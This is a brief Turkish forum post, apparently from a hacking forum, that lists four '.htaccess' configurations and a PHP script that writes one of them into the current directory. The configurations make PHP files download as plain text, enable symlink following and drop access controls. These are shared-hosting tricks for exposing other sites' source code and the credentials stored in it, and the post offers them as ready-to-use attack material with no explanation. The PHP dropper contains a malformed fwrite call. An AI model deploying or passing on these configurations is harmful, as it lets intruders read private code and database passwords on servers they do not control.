Rulez
Forumdan Uzaklaştırıldı
.htacces 1
.htacces 2
.htacces 3
.htacces 4
Kod:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
.htacces 2
Kod:
<?php
//(c)
$filename = dirname(__FILE__)."/.htaccess";
$fp = fopen($filename, "w");
(fwrite($fp));
(fwrite($fp, "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any"));
fclose($fp);
.htacces 3
Kod:
Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php
.htacces 4
Kod:
<Files *.php>
ForceType application/x-httpd-php4
</Files>